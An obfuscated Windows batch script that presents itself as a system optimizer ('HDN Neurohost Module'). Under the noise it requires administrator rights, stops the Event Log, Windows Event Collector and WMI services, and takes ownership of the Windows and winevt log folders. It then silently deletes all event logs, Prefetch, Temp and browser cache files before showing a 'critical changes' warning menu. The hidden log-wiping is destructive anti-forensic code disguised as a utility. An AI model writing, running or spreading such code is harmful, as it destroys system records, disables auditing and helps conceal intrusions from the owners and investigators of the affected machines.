::obfuscated by https://github.com/rahul
@%D%e%bpSrbk%c%CdH%h%wSbHrXhmPb%o%S% %mudUqP%o%Qjx%f%PEuO%f%fx%
s%eDegEVu%e%iKYD%t%zGexy%l%abKefCuEqR%o%NXAt%c%ghOBbiLn%a%otLOp%l%yEVgIUgA% %I%E%OVABvLRz%n%GWToS%a%nFqRyeC%b%UgVAQ%l%XyrtVoSO%e%ZzkPAetkMo%D%asbkrExOjn%e%Ls%l%RsG%a%Fsu%y%ReWqOlvjU%e%Vf%d%uczZ%E%eUqmojy%x%FO%p%d%a%Y%n%CjzQM%s%W%i%Y%o%VumaMLr%n%oE%

t%s%i%dCwoXE%t%Uv%l%iphIDUF%e%OgqB% %pHnJX%H%DYse%D%XhzSLtnWcL%N%VHwxIs% %BCFkMI%N%r%e%SVHMZMLv%u%GRYavvIqc%r%NaNtjb%o%Z%h%KALFXgrgQ%o%ipQXP%s%mpp%t%yzEVnjwu% %GPNu%M%K%o%TcN%d%pv%u%DUmHjsRDL%l%iJTJkHWo%e%dVJUiVGie% %GCzy%-%c% %wO%C%VpgMjRcDCW%l%OiU%e%aLcl%a%McNGWPr%r%cqVXEqAEq% %kgyLsm%L%qcTjPXV%o%ITyHmb%g%rbAj%s%Gt% %HVCuBpZ%a%K%n%K%d%DVKlcaqTMG% %AIpsZ%O%AGBcSPPeq%p%hzmQyIf%t%rYEt%i%CMSB%m%JaTDhDCv%i%UePExFO%z%ev%e%c% %SNxIB%S%oojjYRj%y%DIL%s%gaRG%t%qcAVmYhJ%e%KQzlvCb%m%OnnoSAxxL%
c%nbrG%l%JQhfob%s%IvkkStH%

:: Copyright and Info
:%spfLrqcim%:%ngcKi% %OJG%C%qGcPGjXJeT%o%ARd%p%JatcGgbuy%y%jzfmu%r%nQzffxiTuk%i%RnnnbR%g%fmp%h%eZR%t%sZmWt% %ZXVRo%a%oOdtnwgaAP%n%rrNHXje%d%cYdESap% %ofAx%I%KmZd%n%oK%f%CciJCmSf%o%mG%
e%dJuUABGizc%c%ovXC%h%DaB%o%yIPJRheqNB% %SRbAlyzNPX%=%eVgm%=%HqHPzo%=%OXRKNzKw%=%otD%=%nfAuggI%=%afRjgh%=%t%=%l%=%BoFvH%=%YL%=%AaHyp%=%dZDUAiNtqm%=%FHtorkJEQ%=%iHP%=%pFW%=%MzqpuQJ%=%KHvK%=%fu%=%Ak%=%C%=%EFKnyn%=%Jc%=%zFNMu%=%EYAfH%=%MgYz%=%KKDXJw%=%AyIOzHGwzG%=%BUo%=%bob%=%rz%=%wDe%=%SyfPJf%
e%ax%c%vhBAKuKQX%h%N%o%nZ% %meQdDOye% %SNb% %XgURZ% %ODWT% %rJaBAbUl% %STXFZSQ%H%cTJTtEYLH%D%QHhufq%N%e% %MMoXS%R%qXXDuABkJD%a%fpzpF%h%arDp%u%osJMphY%l%cctEL% %kU%N%mCG%e%oclFtk%u%hYEQ%r%Slz%o%lw%h%AUHrJU%o%hk%s%SGekCMNC%t%jgApUHo% %da%M%LyzWTdYLlc%o%ICycqqsA%d%GqNUugdgS%u%Bl%l%CWBnwN%e%xN%
e%nrjJgkFgYj%c%TbgPcFQ%h%WtNeUinGC%o%RF% %nVxq%=%aLGYFBTl%=%eXLZ%=%ltod%=%UUpchgz%=%IAxMa%=%y%=%APwjcL%=%SHIrazRV%=%zrFv%=%XYg%=%pDxw%=%BhMu%=%cea%=%EdpJAFU%=%IpGWWrjXa%=%opFNCctHCY%=%CfSSaE%=%AK%=%zxPTLftI%=%zhQIO%=%OXORlq%=%S%=%BElYVgWVj%=%q%=%lToudJivOj%=%pUrmhXBwqX%=%C%=%SJHnnhstr%=%lfCzMwjQ%=%rxdxHrb%=%Psn%=%APlRxip%
e%VabbDmKh%c%edGPPvTtb%h%yr%o%S% %ESoTGmF%C%nYpxmVWd%o%wS%p%AIEBXtx%y%eU%r%TPVgLena%i%TbpKUypk%g%KjXuiK%h%lNnGpZYsbm%t%PmDGg% %iV%(%EQanD%c%EgJudK%)%WjmttEnzrJ% %YLVskjwd%2%vxXj%0%LML%2%NzGlpjGbT%5%vuBRUWKb% %SMsYFRcMh%R%Af%a%VwIRxHVSH%h%pOQsvvP%u%EsHm%l%wVfJ%.%MNQNZrrl% %FjdVRm%A%INu%l%TwmAW%l%ooMmPy% %oJgc%R%eQOJLca%i%HjBo%g%dh%h%UDXggEH%t%uCiDzHMASS%s%klXQxB% %YOynAk%R%QVgPsjWdaI%e%SBI%s%BvK%e%c%r%aNb%v%lW%e%v%d%tdA%.%XqYTFNkP%
e%wbBlP%c%imyCi%h%higLcAVELG%o%iyIU% %oMxWfWInC%M%CW%a%QTjmiyB%d%gXowwFKTU%e%VmU% %CpWTdMUk%b%cIqr%y%qhkYyijCK% %ZipiFKqr%R%wEc%a%RGAURMdrd%h%ngvcSu%u%gRhHpzqhw%l%gOZCritjbS%.%qcTKFeVJAb%
e%kpJKfjeYVL%c%BlqrrjiP%h%n%o%VqRxjOCP% %YcSZGtydCF%=%WQnE%=%inPACvN%=%WnxQf%=%bSUt%=%wzF%=%jKlkryoezV%=%dCR%=%QdneRzruc%=%MrOF%=%Jax%=%HpVjKDX%=%RzURMZlbg%=%QIs%=%dxpEe%=%ynwtWXSN%=%ZGGpZ%=%segLRlyMS%=%MECd%=%BpCJr%=%paz%=%fll%=%jtYwyaGpM%=%iOfZzGkq%=%vwTe%=%yfK%=%wHaxtqZSYN%=%YHc%=%PoS%=%dOY%=%yWdQi%=%mAE%=%uHxFXoG%
e%w%c%lpVS%h%bmhRv%o%SwjXwn% %Yf%P%tNqXph%l%JxvVTaC%e%CHUIV%a%ftGnR%s%vhI%e%Jr% %gD%r%nDXhYQ%e%tZObrFQaTd%a%TMbkLWcDSP%d%bf% %tDpiVQmtdZ%t%BwkuQ%h%FzA%e%SPvhOMcW% %Nwrg%i%LY%n%BoFKCbsZ%s%FS%t%NhLiFT%r%dbUamYgD%u%xmsEHQD%c%blZ%t%TiSv%i%zIXpUfVCRM%o%Nl%n%lOYqJi%s%CjTCE% %FT%c%yXzjpWlZ%a%l%r%SoNG%e%Z%f%PtQRlZA%u%XwsOkaXTy%l%EhOlnKuwv%l%wyefafX%y%WUC% %roBZIsWs%b%zAtV%e%mUTVTELTiH%f%EGU%o%MmbpL%r%ciqbRHHr%e%oWenurEsoe% %YNvufUTMTP%p%KrZZV%r%gUMkHwKIy%o%WVnPtJ%c%nBVSWvpOZ%e%uIwdKMcwdl%e%PmDlu%d%Y%i%CGVOS%n%LBlOtjqBZ%g%PRLsfcToU%.%P%
e%JVsnMPUxjI%c%RvaWZ%h%OGuEzUT%o%gHLvwb% %pUjqgzcEWv%=%wekW%=%k%=%DLtP%=%ckTAXsvyE%=%RwfEZ%=%QrWwVjB%=%sjfIxKB%=%lY%=%lrGzCgBi%=%h%=%z%=%axTKw%=%LVjtuy%=%FH%=%BeaykjqMnW%=%eDhUB%=%QcHAbrc%=%F%=%pEJGycyEk%=%hJWKww%=%XhETik%=%nHDetJZ%=%CBdUiJWt%=%GKy%=%geGkmfFc%=%PUy%=%O%=%GLj%=%hlhsooQMKy%=%yKyg%=%aR%=%crrr%
p%IK%a%CxfAnA%u%CMTXSjIuXA%s%v%e%sFjCAy%

:: Ensure script runs as Administrator
:%Qcr%:%SjoQLrf% %Z%E%gm%n%pUZqteOVbt%s%PmHj%u%baEuJNmRD%r%CnU%e%sgoSwr% %pRCWvOPO%s%IChiwZ%c%UOmslsVJ%r%PZcd%i%gwb%p%AI%t%MUDSzniu% %wzUxviQ%r%gHwawgB%u%EZmBJxQy%n%A%s%HdYYdnw% %ldNkrQIWP%a%c%s%wmj% %RNGHiYu%A%TMf%d%rOf%m%vRtSkQ%i%rSEokIaAu%n%qycuZ%i%qfWhzCxgH%s%YFnzBBcXz%t%KdbtmI%r%I%a%hovnSGzvzw%t%nN%o%Uv%r%EM%
N%CkFavRPty%E%PnA%T%P% %UI%S%y%E%SvoUzer%S%dytjGbbFSd%S%zH%I%OYyBrZpE%O%TltJoRi%N%hi% %wdqxhTA%>%xwnsfKIX%n%byEFtv%u%nisuBwb%l%fcVBHx% %XntoGfQaUr%2%eXgmEW%>%d%&%t%1%vtGTx%
I%VyDYYNID%F%GNM% %tqRsyLIIn%%ERRORLEVEL% %QZIml%N%wrHeCBQ%E%f%Q%ppRds% %z%0%Im% %yzgCSbEZu%(%xyFXhJIlF%
 %vGGVrxMte% %futbI% %wexLyEG% %fWJFItkP%e%tixfwfCRwb%c%aLZ%h%YnbM%o%OdWUtKQNgC% %xQaq%P%ttxrLDze%l%J%e%UNQX%a%leLrNMR%s%EqpEpwXxDe%e%eB% %sus%r%nqLlgyQfUK%u%JkDXH%n%DXkF% %AJEENXkuX%t%fackBWu%h%MN%i%RZuv%s%FIHhOicC% %TNKTVDQD%s%WwHVLvoxQA%c%kpdOqfx%r%faDiCelUKF%i%KKtHTI%p%XYCDa%t%JUGowxa% %S%a%W%s%mJGdE% %QFvkp%A%f%d%ZvKf%m%bsWO%i%hDRGuYLxpo%n%oDNQGV%i%AlzjU%s%kfu%t%yTKXjmUup%r%phiE%a%rTIYRIEqC%t%CX%o%hWZKbSxw%r%XnJWgB%!%KQmz%
 %tVtlEkLKEF% %qRnetyu% %G% %gLfvtKVEt%p%JzP%a%Bb%u%WsXq%s%NakDoCBkyA%e%JjWbGlmF%
 %OJobjKEyqA% %nez% %qvSSUzc% %z%e%zMGXioKvR%x%G%i%FT%t%GEWpLP%
)%V%

e%hdeCo%c%AXVDc%h%ZGXvvmh%o%O% %MFIhqCC%S%DjyO%t%ZmrqCvPpFy%o%xkUYXDqYS%p%rqlkdSye%p%X%i%byVHrGxmVK%n%sFLhqijUg%g%T% %bwxVqdhK%W%hSjTsaT%i%SxVFKwRcXB%n%JydBsUl%d%JLXMJls%o%tzDy%w%PUgvusQy%s%lc% %sX%L%sibl%o%IS%g%g%g%NF%i%aHTo%n%swQc%g%vKB% %YApdCfy%S%nk%e%zWKfxyAzt%r%diavBpnTl%v%l%i%YOxuJJM%c%P%e%eirszm%s%SI%.%mi%.%Qbxjnyklld%.%IhWgnnzfgw%
n%qaPwUq%e%OLC%t%cce% %sXrRgZhKEn%s%ReUv%t%dBUn%o%imoCOJIXxQ%p%Iq% %Fbb%"%sTOEYKZiPt%E%rBS%v%RdhSnkM%e%jWFqpKZZ%n%XTtE%t%ldFzQWtRmx%L%KJivbR%o%HaOMW%g%APd%"%dppdFE% %lpcwbBeBm%/%Jnyakdb%y%LXUXF% %Zx%>%UBYWK%n%vRs%u%ZPf%l%CxuCRq% %uJYzWfb%2%s%>%FmWl%&%OAvwVnX%1%mMbdpQV%
n%hDD%e%GwrtgbURZq%t%TiVBNGaei% %oIejlrAx%s%WdvXTZOsa%t%uwMqfbtDn%o%xGJ%p%hLKdezIW% %CWTWlfxCj%"%YEmeG%W%UTLrWt%e%NsXpF%c%kGMCdyGST%s%dh%v%yZcY%c%m%"%ZhMnWUUt% %ioxZJUXwoK%/%TQjrSYUCNB%y%pNBp% %NpOjUB%>%aDDhjCF%n%uCkPrVc%u%zXZWUaZYj%l%X% %mBBTSkopne%2%xyQiwwUSP%>%sLXWEm%&%Wpim%1%w%
n%DsLdLiW%e%Q%t%HELqcztds% %MWakHdiCq%s%JTG%t%TORC%o%FuyMlAQzS%p%zqhpK% %Vi%"%bO%W%pllmfXnaIt%i%vgRd%n%VaeaFV%m%sMBjP%g%SFNs%m%F%t%ehx%"%Q% %L%/%cgaefabo%y%xkbmrVfC% %OclZm%>%yPHb%n%ViKbPGia%u%cq%l%oOH% %FEtfXUEZ%2%YhLrXcB%>%VJRpdtqP%&%nssJn%1%OBo%

e%VjufZqJi%c%iZOGT%h%OLSJIW%o%BnJCg% %Sl%T%p%a%i%k%nHZaZCGikY%i%cFIemxuS%n%wntHQkxYy%g%KYWjL% %ZRxSfZk%O%ZgOi%w%LqoqOkKqqc%n%ptEVawYUrs%e%NRMCPO%r%BrLpPb%s%CDtREWOqn%h%bFi%i%xlCrPpbqsX%p%tAJALkaI% %jUIRVW%o%wzijxOiZEc%f%zKWqFbMV% %cx%L%ZiHkXjgVu%o%TbZD%g%aBUjmG% %EhYUROiu%F%XNhr%i%rStA%l%QA%e%dKASuGWFN%s%dPVR%.%Un%.%oHVt%.%GubH%
t%hRSfRezt%a%ODmdaLuA%k%ewmyDgWKwd%e%LdtUZyjP%o%oYrHmM%w%YGsy%n%rP% %SLdh%/%iQwGSjS%f%QmjMNUVwl% %nNWnXCqLqU%"%wDR%%WinDir%\%FRjk%L%iVYJu%o%J%g%NpmReVvfJ%s%LloyLkJtZz%"%uew% %ciW%/%UeGcKWhPn%r%Bb% %rwgARexXfn%/%A%d%TZGLWD% %WHw%y%KJmuK% %WFNqNMwnb%>%ejb%n%VIgRwJkXOw%u%VWnNhxN%l%rHCviHa% %OCbYv%2%a%>%Sh%&%WctYqISEH%1%Cm%
icacls "%WinDir%\Logs" /grant Administrators:F /t /c /q >nul 2>&1
i%kcQId%c%GftmDThE%a%sHyiBtbUH%c%Lrsf%l%dnke%s%JwhviLXT% %XXPeOuD%"%MkurVvanSp%%WinDir%\%bOOZEMp%L%GZXaKNAdQc%o%lcOSP%g%SwzJGIf%s%davHrIC%"%lODvEW% %WdyTJD%/%c%g%aEuPKoXirP%r%bSb%a%a%n%GsptqrXF%t%UzYya% %USn%A%ATJFQAGyZ%d%xxgmxFmJa%m%i%i%k%n%cQjSMh%i%Z%s%rHJRLoZI%t%A%r%eDVGhI%a%DFXvIz%t%qPEHJD%o%jOYc%r%j%s%tzf%:%eIejUUxET%F%OIJFB% %HilmtLN%/%qaRzXUG%t%kEPppiIkX% %c%/%XOxEvwxf%c%Br% %vlTrL%/%fWPyEK%q%a% %gxQ%>%eimiGhfLND%n%ENCsxmG%u%ybeZTDNZoj%l%qy% %oPajMDqHmB%2%LH%>%s%&%xVqM%1%bTKLjX%
t%KOuv%a%v%k%ookIwhuc%e%FYpZAb%o%wjv%w%tPY%n%VJ% %TrtRZ%/%ZFPwX%f%o% %pgSG%"%YXGxUyRC%%SystemRoot%\%qb%S%zTsHqPmT%y%ZMGBjKljB%s%BcLD%t%ZBQkpLs%e%VCdb%m%XQFNXmfYaW%3%YT%2%REWPG%\%JBPKnvVb%w%f%i%oX%n%MNCE%e%tFhm%v%deitt%t%Xfwx%\%rM%L%cC%o%evychN%g%bXo%s%YrQvv%"%hM% %iTA%/%MvWW%r%iThLUON% %j%/%ySnrYU%d%wZAlO% %VtBHZIzWR%y%wqjtfaoAks% %QLRukw%>%XyGWXPAz%n%kM%u%NVMn%l%fzjb% %PLt%2%GJ%>%zeCOEW%&%TGgkH%1%MfU%
icacls "%SystemRoot%\System32\winevt\Logs" /grant Administrators:F /t /c /q >nul 2>&1
i%TQ%c%jGNL%a%UJCOOpO%c%iOeD%l%XoMRCH%s%HGDkkYGVpm% %XQKA%"%UWxJaL%%SystemRoot%\%UTMNrBXAv%S%GVIomAac%y%GcvyjivGL%s%nN%t%RjWaWz%e%qw%m%N%3%j%2%krPb%\%hdYapBNbfh%w%O%i%euMVjqlmF%n%a%e%YyLA%v%Yxb%t%C%\%BUHZaYritp%L%vs%o%sGDQAefE%g%wbSZlzh%s%MmYatK%"%KBlMeE% %A%/%WPrhzQEbVu%g%I%r%IsQHtntMbh%a%py%n%BTvnkwyM%t%YBH% %kStm%A%FoqzG%d%LBAQFNzNov%m%kF%i%QNmW%n%loyZ%i%H%s%PzjZZqKX%t%Qi%r%hRZa%a%lPtG%t%k%o%GT%r%D%s%pUyJP%:%gkqhSBYHS%F%vThlEnjwu% %AxVNij%/%mRuFifIOnz%t%gtytpyeRUC% %e%/%UKzXyb%c%klEe% %FDPhtlU%/%XuarWACYsm%q%XT% %c%>%HhvYXWt%n%RAXV%u%WaTfr%l%hhsfkDbk% %KaXORHDGXK%2%p%>%AIur%&%Kuzp%1%RcBcuWT%

e%MvppK%c%zKG%h%vwHPIhwr%o%WjEFn% %NPcTVDu%D%lhkrFS%e%dgphnKVa%l%oPLq%e%qbJs%t%RlMM%i%DQw%n%aNrDxFQN%g%sUmFztaTwz% %Wnmi%A%v%L%WpgZUvJJy%L%mPuWumBn% %hNkqY%L%YZWusBh%o%juoPDj%g%qjnytBPPq%s%eKv% %vP%(%SIBIkes%T%rG%h%RCPDxrCxx%i%OrBUl%s%ZgjUVMc% %gNTiuMpH%i%TtMTmagQZf%s%tQKlbQadZn% %x%a%CCrjlXe% %SeQN%p%bzLGN%r%d%e%AonYTlq%-%LnPmoIuzdy%s%mizjpTSIp%t%eI%e%s%p%CeBp%,%vj% %fsWGIdLzjX%c%OBSBYwYoV%l%VQITPY%e%RT%a%wTM%n%JaweG%u%d%p%B% %SPDYv%a%qUvobBV%f%TXetcvMOtv%t%PinPLJ%e%VOly%r%lhpzZBzy% %LtjziP%p%LFhpcMZpDE%r%npvwo%o%GgtRn%c%oVVeRrvT%e%cWGPbqo%s%Fqnq%s%eJOj% %QWwaoLRU%w%vH%i%amBGh%l%hRSpS%l%ZehmXMDhv% %dwv%h%aJQtg%a%p%p%QihfIvG%p%o%e%KTLbDLIbPe%n%CbB% %FYpqhHEdEb%l%x%a%afyjFXsbeN%t%F%e%SYyIBP%r%OlIq%)%yo%.%z%.%NUJulgh%.%kYgdynCz%
:: Deleting logs (temporary, to clear any existing logs that might be relevant before starting the optimization process)
:%dDrp%:%fegyJcBU% %ltVlzR%D%GcGcNvp%e%Bm%l%RnVozNbye%e%qu%t%jSbjtLORkb%i%URJ%n%IQrrm%g%oozQIOxsdw% %CCyKcDcrGL%l%ysGVM%o%JIKClJJD%g%faJH%s%UwNURh% %sukFGig%(%sMFVZnCq%t%HevAohiA%e%diO%m%ZMUMFjX%p%a%o%DAy%r%OuMKABSFi%a%DCdcAhAkz%r%YFmRDyHJW%y%lPNGk%,%FrVkB% %nLKUwpln%t%NiB%o%VPqQTKVgrN% %al%c%z%l%BcgYMrE%e%dgMKkkR%a%HFguEbaF%r%ejQZRDPnd% %ZOw%a%Bs%n%u%y%Pkvca% %uEy%e%BqqZMRb%x%qPoBhXRwlM%i%b%s%rr%t%DIKS%i%YgTP%n%OUbSo%g%mJhoP% %bNmHYRoyMM%l%GOSFWrhRaq%o%mPpYXXDN%g%yfbH%s%IktVrTKCp% %GUKNSNbhBv%t%Da%h%TYIo%a%TDYdTep%t%fldnvZipl% %IB%m%cCLHuCHc%i%EjGXlzYD%g%mwSIQS%h%EZo%t%XjdalrpSE% %ein%b%iKtqfpd%e%wPYZ% %GYgcCWME%r%GnclAKM%e%jlBklriZ%l%Cbruzavf%e%d%v%HlJNaHoGC%a%yKYzrSivmy%n%LNzRtFvLqR%t%F% %xLdMSNrB%b%ulWSyYCqQO%e%jg%f%OSD%o%AE%r%QPNg%e%WKnpkI% %GIiHUbV%s%sofYEDCD%t%nCEmejGFm%a%HSHJGfALN%r%BTYT%t%wz%i%KOUxOH%n%cxbSRt%g%jUFDDBk% %MGSPkdbIg%t%O%h%mWeGPJc%e%oi% %ijVXZcN%o%nXKjhMb%p%rlHq%t%c%i%esDyKu%m%bTxJrbhhlj%i%TAvcioL%z%zDoBkJtv%a%BjaFwBo%t%NBH%i%JGmAY%o%gZSaXs%n%NxD% %cIZoIS%p%E%r%HcSd%o%v%c%a%e%KQvQZVVXY%s%lBGGNWuze%s%Srr%)%WTIGI%
d%lVsxSK%e%uCsAM%l%snUREfA% %B%/%iRLbNyHg%s%vJcaYAKl% %ucTogKQI%/%fA%f%nIOHRWUBzM% %kXpmW%/%LST%q%YYuRLphxF% %ZXUZ%"%SUVVtwfo%%WinDir%\%WpGKO%L%eWAaX%o%oLyA%g%CKZI%s%dD%\%gvNCzN%*%qNStl%"%oepjXrLbBh% %FfVOidS%>%ZxfaUcSER%n%UPu%u%LeyTZp%l%aTFml% %HfGwjl%2%T%>%uun%&%MfK%1%KxviXoXo%
d%F%e%TfNNH%l%OAv% %lkG%/%GZ%s%jci% %KWf%/%PvadGEC%f%FbqlMX% %L%/%mlVT%q%xQTWqbAMaz% %GoYM%"%vLTQaD%%SystemRoot%\%jX%S%SuZm%y%PJg%s%ecEpHXYnG%t%bQrm%e%DvtgEh%m%UCY%3%Z%2%GAgjzqiWIM%\%FiK%w%rBLs%i%WbHNJjyB%n%TrhhEVDiJF%e%Ypbe%v%OplIbgfoZ%t%WMr%\%sjNQewb%L%YS%o%UYLuliTk%g%Y%s%EFdMFPvEt%\%QD%*%hwRBcAIzT%"%eHZY% %wSuzdI%>%OKmt%n%tCX%u%AE%l%wZxZY% %ORcHb%2%ggx%>%PkVX%&%aogHDZ%1%bXKBC%
d%nW%e%OIChZXv%l%bmCBJxqqt% %gnnZkZzE%/%tpcMX%s%d% %QSrlpzfUy%/%FXBXcCmuzt%f%roWqgmsffW% %lfs%/%P%q%cEWzNWYqs% %cbRDqPas%"%IjDwQnHbl%%LocalAppData%\%TdZ%T%guXh%e%ftiGcLrKi%m%RngBdmpTDZ%p%kc%\%omW%*%QpCs%"%HdUDibe% %zD%>%yF%n%HfT%u%QtLQfhYDFX%l%ixysXYnQS% %UJe%2%kTKJA%>%N%&%JeSEoUCF%1%DeBfVhRGkl%
d%ohfp%e%OwAny%l%kFppc% %xQ%/%GVgoF%s%GU% %G%/%CueNsi%f%qsKwaI% %I%/%EYNED%q%acd% %KDOOhGX%"%Mq%%Temp%\%j%*%nfczDwg%"%CUIulg% %TnGdSJec%>%HSlrN%n%PEzUzfLZqp%u%K%l%YqSqL% %SVrMFjuDuC%2%c%>%J%&%uthDgjLjw%1%TJJGJKfEt%
d%PKSRmMki%e%vDeyddL%l%TOs% %w%/%GihuTrPh%s%iuvY% %uFlKX%/%uxLU%f%fDaYqE% %xOgHaeRp%/%yIR%q%cGo% %JlsDdNvU%"%eb%%WinDir%\%FqMkX%T%KGIhhS%e%ZwMZSClXKw%m%IrHLFeVdD%p%ZoxlQJVA%\%vwUqax%*%cVDxjUJUsE%"%NYFOJjBn% %wSoMYGaslL%>%QP%n%zA%u%KYnB%l%ZDUFMHM% %ouwLwKuw%2%XiYMYOjYn%>%P%&%C%1%gfobf%
d%d%e%kUNORpc%l%NyXp% %ZqljJiOzPE%/%XeKSuhcwal%s%yYvgwQVSh% %SdQGBTtCOL%/%DuzQZdA%f%dsmbK% %sUYNBFL%/%q%q%ygLuEpnP% %RLIHVswJ%"%pA%%SystemRoot%\%KErHY%P%YfidGoH%r%ptuxjQhlw%e%ZGmiBXYnt%f%SCja%e%FGlXpPCZmG%t%ApSJ%c%BWK%h%bHYqmjestt%\%nMJiynrsyt%*%vBvjhfnLZ%"%Z% %pc%>%rKgVD%n%COzhxlyIz%u%HahdJFfe%l%YEVUgX% %GrgVGJiUT%2%kQsIslZ%>%NeYNuHv%&%jQQuNvxH%1%RGfGgXeUMN%
d%lLXbtDnceO%e%KtLRNNh%l%v% %EXLbT%/%mgsSPoO%s%WunIGswZA% %TK%/%SV%f%CbsAz% %MwlUrm%/%yjEgCrFgz%q%sxnJlXL% %ChYxlkSzO%"%hlm%%LocalAppData%\%WVzVFjRAS%M%x%i%KCNcUHNXP%c%Ecv%r%s%o%KFnIoPPXJH%s%sGjxotLfb%o%paGKnD%f%Zahhu%t%FKmg%\%M%W%sFNSfoNGRV%i%yNgqZtcC%n%U%d%yBWPcAGzd%o%GtutW%w%ltDpDorg%s%F%\%NqIhhi%I%lrC%N%TJh%e%MoTcRW%t%JCjWrGnjS%C%Gnuj%a%SqDdnA%c%UKJU%h%BojVc%e%Jass%\%wsXsxMkdVC%*%XssofjTFXJ%"%ml% %vtPrFklYWZ%>%G%n%Rm%u%wHK%l%Fr% %pRigoo%2%sDJT%>%zGpghXA%&%dRSmLC%1%evNP%

:: Main Menu
:%ywofWore%:%vf% %A%M%gEDnKpV%a%GpvxCpZQ%i%pwOEawz%n%Yyyw% %nASMrpA%M%nz%e%glDBvldlLE%n%OUnD%u%C%
c%hGQko%l%CMQaoXUTZ%s%KsVubHwWC%
e%IxBRRhGjxu%c%jCnJpbJUC%h%qwXFEMYhIF%o%KM% %ibFNmO%=%NuipqjmEky%=%DPFKhs%=%FuluIjhcqI%=%EFnpvUE%=%MFfiri%=%NbTh%=%ThUYGUmo%=%rHC%=%lPSnPzxii%=%CN%=%dvzXLL%=%XrkSI%=%mrTgvJJWXb%=%IQtJogHH%=%nRgRkJpo%=%SvEeDV%=%d%=%FvxLsYtJcf%=%rKlLVhrSHP%=%yBzx%=%gyhSCJk%=%hCZGcHt%=%DVWJn%=%OyoJBTlQLJ%=%yPtijXsFb%=%TRgZTpsHvI%=%wqdxXVEvOa%=%DyHSf%=%T%=%CDf%=%D%=%EagdDnaSi%
e%owjS%c%vtjRWjPiG%h%yMrHnIoNHy%o%XAdcPrJvUn% %EyRlZ% %wbdaIuVm% %OFBHusisY% %rhJAKemdoM% %hNSa% %pdBa% %UrDjxlJd%H%ctRU%D%C%N%XbbeqQcWoL% %cvDnpxoR%N%hXf%e%ieXaUJBS%u%krgcHBwl%r%ndz%o%D%h%NKpUm%o%zmXeIOsP%s%HBrFoWDe%t%QyIAYXblQq% %BJWIAUQzNL%M%xXOqwTp%o%pMirQdoNLA%d%SD%u%r%l%OStLQPg%e%gJPUtTKOI%
e%I%c%yYVnFvEthH%h%NHRCxhqAR%o%p% %qpxFD%=%lfy%=%kIOzFV%=%y%=%AmwYqRb%=%hyZIRlXH%=%OFHBasyP%=%josnlWev%=%IIPcmdTJy%=%RAl%=%JZMLoCMdAA%=%RsGXLHpaPK%=%rjPlVNMfi%=%PFaA%=%zlWudnxE%=%jDdl%=%IRdJAEU%=%H%=%CsQRszDC%=%PBYsWJ%=%KMKvJFa%=%XMCws%=%eewtWMY%=%pE%=%ZlbxsZNRLz%=%KHu%=%tYKKB%=%fbgjZuSmOJ%=%lACJ%=%blKF%=%d%=%pJmp%=%RPuOKRwvL%
echo WARNING: Optimization process will now apply critical system-level changes!
e%gYPGk%c%mvOjtGwD%h%xNpLCSc%o%AJs% %A%W%GSKnaWH%A%GfVM%R%C%N%S%I%U%N%qNbd%G%SCFaLr%:%YlecWjm% %fbGfnZ%O%DGZexw%p%IelD%t%MzDmZ%i%QJVgbfq%m%MCg%i%OMFm%z%OBaB%a%IVoMxZfPgw%t%q%i%XM%o%IYFEdh%n%QIKMQ% %QhWpSM%p%MFd%r%zvVPKtV%o%BnXquokJSW%c%qJxrWu%e%s%s%CP%s%fpqrIF% %FkoI%w%TuNXBFcVv%i%KMhDQ%l%GkRivF%l%fXUG% %k%n%BNnyzv%o%HEJTk%w%GFwt% %VZx%a%fB%p%hjhLJrF%p%UYMcyVSKFC%l%tsqZnRN%y%ppEcevnA% %Wfwkox%c%c%r%daAcheNC%i%ftERoNZJG%t%JRhczyu%i%mNIJntLhHI%c%Tlz%a%T%l%qrdf% %FYJvZuarFm%s%CqCMTEvj%y%DvlS%s%ntm%t%fadHTI%e%TXhNoQP%m%qUYccTAGz%-%ug%l%qirjbc%e%BRqd%v%AijNsRKAEQ%e%steEascm%l%LMyJs% %lrfAr%c%ssWzhqjW%h%dENeMogv%a%ROyLBqw%n%MBip%g%kaFxQrKl%e%flMxlb%s%NY%!%pNJC%
e%IConIEn%c%YqpNwN%h%ZWrn%o%XfuViKzax% %uFSHEje%D%tNWTN%o%f% %rzDQHUBoI%n%dpwyRg%o%KMmiQcAQ%t%EVsGBkFxkr% %Ca%i%sNAwFsS%n%Dwkf%t%xIhxswxeR%e%z%r%oaOHJ%r%QBmKByr%u%PsbKd%p%haCGbuMcl%t%G% %BKNlpeFuhx%t%sOiB%h%tBTAWrjUk%e%RB% %HBErMJJdn%p%nhDghm%r%a%o%q%c%WaLRMnsr%e%ci%s%oAHnKYy%s%QlPqe%.%XwmUWUIS% %sOwBayrp%T%EgCPPtAg%h%EhgkZbA%i%ZDIdrukmRk%s%cvMRuYIVC% %fn%i%B%s%MF% %pjGaEAS%f%xamo%o%WLSrfH%r%Xgqhc% %iTGXa%o%wri%p%yz%t%hFtvmvkQL%i%yIUvSoeO%m%q%i%VFcejea%z%MH%a%SraDIR%t%yzWVMvtcB%i%kzEEWnMg%o%nYqrrCSg%n%EKTqOOgf% %B%p%wbWSBGeLf%u%YVxYEMT%r%eJ%p%tSlzlNzKYT%o%xuIP%s%mbPc%e%ZlmziRZ%s%P% %pnkXbbgkYH%o%vziIOWffRQ%n%ImbQmkoFc%l%o%y%cHvYTmJBNM%.%WDBzTMUtHC%
e%FnFy%c%KI%h%lZN%o%jbDTDHGDEM% %zh%=%xAMAe%=%oFwdpn%=%Hh%=%xVtveOtHFu%=%UJDVJ%=%jnQLCw%=%PU%=%qSqFHCfH%=%mFZDlbi%=%UITU%=%P%=%nJ%=%eiVtHcv%=%s%=%W%=%Fvk%=%QhQ%=%BsniBGfH%=%lEsCSIWMM%=%EFYtQqgeFt%=%yxlDCJjw%=%XmNwpfd%=%PDh%=%kp%=%eEPzjxpGC%=%wxFBfw%=%uLJpg%=%z%=%ifMMTcrPqw%=%oKxVBkG%=%lUTmNhKO%=%mCLa%
